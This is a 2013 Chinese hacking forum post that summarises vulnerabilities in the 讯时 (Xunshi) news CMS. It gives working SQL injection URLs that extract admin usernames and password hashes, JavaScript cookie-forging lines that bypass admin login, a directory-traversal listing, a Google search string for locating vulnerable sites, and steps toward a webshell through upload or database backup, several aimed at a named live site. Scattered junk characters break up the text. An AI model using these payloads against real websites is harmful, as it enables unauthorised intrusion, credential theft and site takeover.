找回密码
 立即注册
查看: 3078|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘& N) n$ ~$ F' U! j

' T0 m+ A4 ~' u: ?5 P* i在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)9 c/ E: R" \, u; _. N

1 E% j1 [1 M( |! f" W- s/ m以下本文总结来自黑防去年第9期杂志上的内容...; X& Z, L% c6 ]( r" _
" F7 F# W( }% J+ E: A6 H
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
9 a9 S, E7 s+ x( H$ F- T  [
0 \* S& [$ n/ R, v9 O* U3 L9 y26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
: [/ v! V+ H4 }2 }6 |. x+ @3 w" g. \& z
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况  H( S( A' U5 r) o" g, B
这里一个注入
9 f1 U& Q& E. n* `. x: \! v( \! j
3 R$ D- E7 V6 t) A效果如图:; o; Y+ r2 s& r5 U, @! x( f

8 j- k; V5 ?* W' v4 Q 8 d- Q* w! q: B5 x: w9 P  c

* M' K9 k7 L" ]' B这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.* P# b8 G1 z1 T" t5 K
0 h, ]6 u; k* f) n- f5 x3 X) G
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去6 _% _: E' i2 ^8 H, v! Y' j
" }& g8 K+ W8 V4 d8 A% a$ l4 I
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));7 C. q1 T( h1 X. W9 ], ?

+ Q& ^$ V+ w& I& {那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
! X9 x0 F- m  l9 u* k
" V3 @9 c2 U" C# K! O因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
" x' e( V: s; }# g+ Y; m
' U3 U& p+ O+ \- x2 E# C% R' j它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
/ y, S$ i* [8 A; y4 r- ^  P; L
- o) a7 O4 p' m1 E/ B访问这页面来列目录..步骤如下:
0 W: P9 H- q: C4 o4 u& H1 S/ \2 i7 j
javascript:alert(document.cookie="admindj=1")
$ J0 @. m. ]$ b# P& N1 V
  v8 o4 e7 E: E2 t  |http://www.political-security.co ... asp?id=46&dir=../..1 Z2 j* ^, Z- h/ R* U+ |
9 n) x& i. C9 K! h9 z
效果如图:$ s: v1 C# p$ M8 _- e+ Y
; I# S: L: [# e; ?0 d; v% J, J
7 w% T- g+ o; m" y5 w9 x4 g

6 h2 Z# a1 v; j, Y这样全站目录都能瞧了..找到后台目录..进去..& k& e% r" s7 C6 z; v. v9 `# X) |
+ z+ N, ]7 M9 {$ P/ }/ S# }
那么进了后台怎么拿shell??上传--备份就ok了..
' d0 U+ s' N5 u  t  `6 ?/ w" p) F1 {" e. c7 h
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
9 b8 b: r; w% e! N0 K0 M: h
" B2 B. S# J) [- w6 k这个我也碰到过一次..你都可以通过列目录来实现..
8 O1 |& x3 {4 E- X/ t( |9 c* [7 @( _# @4 y; ]% d9 o' k1 J
javascript:alert(document.cookie="admindj=1")
+ g# |, F) Z. [! {! U: p; v. w: E* K: Y
http://www.political-security.co ... p?action=BackupData
3 l4 {. X7 F4 Z8 v0 M
3 q4 y0 D8 b0 J/ Y2 D4 Q# y. \, }备份ok..
& G/ @+ B8 O0 p: y: [) Z8 o: e' E. ^3 m: r3 ~( w
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?- E2 A: x- T( }% _& K$ o! Y

. }+ S9 g1 i9 _$ T在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
+ n5 G. ^( M+ a* Q/ e
' |% S5 T$ _& {) `2 l- T$ I$ v然后访问此页面进行注入..步骤如下:  g3 ]) q3 @0 T+ h' [6 f" Y

" U7 ?( [# j7 zjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")6 w1 k" @' s3 {5 R$ _9 b

$ p) j: A3 _3 g然后请求admin/admin_chk.asp页面
/ i( y, {1 z8 r, B6 h5 r# c; B' o+ v/ v# d; A/ B9 q- W/ Q- A6 }3 C( J& B
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
% R$ }: n; T5 G
) k' ?' l% x' Z3 A+ f26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin# }1 z$ E' `7 ~" o/ n4 f# V

9 J) E% M# j/ F8 y效果如图所示:
: f1 Y' h2 L/ H- H. \' B
' ^7 h4 H$ s6 j2 K. u3 I. W7 t
' ?& T; Q. D7 o( o0 Z. J" |0 D: z$ Y
讯时漏洞2  {) x/ N" y/ N; r2 N# F, ]
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)8 g3 l* K5 e0 [& W
; {" M' l/ F5 y* S6 V
1、/admin/admin_news_pl_view.asp?id=1' Z% S5 g, e, B! B2 X
//id任意 填入以下语句
# R5 T0 h7 }: X7 I5 h4 P 7 {5 c1 X% H4 Y/ _8 x+ h3 y
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!$ C9 h& x% Z) C0 q6 p+ r. `# P
1 ~0 }+ A$ ?* J5 _1 J% @3 x" T3 n" D
& G1 j& F, g; m% n: G. {

5 f* U4 b% ~- s6 c, R7 G( `% P. @3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
% T' ^9 L% |' ]' L" n ; J+ y: m9 J6 p- J5 J, l7 L+ v
3 p) s/ b8 t4 @# S$ I
9 [) n+ K6 z6 B( m. ]
爆出管理员帐号和密码了
% M! H7 b2 p- w8 ^. w + A6 L6 j7 T" M

1 j" [$ P; r6 m
( D  ?1 T1 J! d; z5 n4、cookies进后台
$ R6 Q3 G% U# l/ C
# o/ V$ A- k0 F$ jjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
% S: S( b# i8 X2 N, K; p1 L
4 q6 H& G2 @$ ~) p! `. i9 m/ e6 v8 k( W$ O# S; J
. h% `- T) J# {  f7 T5 F
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!& G; t7 R2 ^' o9 q  E
4 R+ I( g- R* Y$ C. m% u6 m

2 [. ~8 F: t4 A- n: v8 D$ Z- @: Q& r, W& x. H4 c$ l
6、后台有上传和备份取SHELL不难。
4 W" O' x/ S1 K + r; ^" g" _6 I- B+ I! _
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
  o  _8 @0 Z9 y  E6 v 8 w9 N9 }* m& o
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
3 T2 c7 {: K6 U# F& r4 C& O- L6 w5 H7 I3 w0 G

, [1 ~7 _0 Q2 u$ K. r" o
+ Z: x& c! g- L8 o2 J2 ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表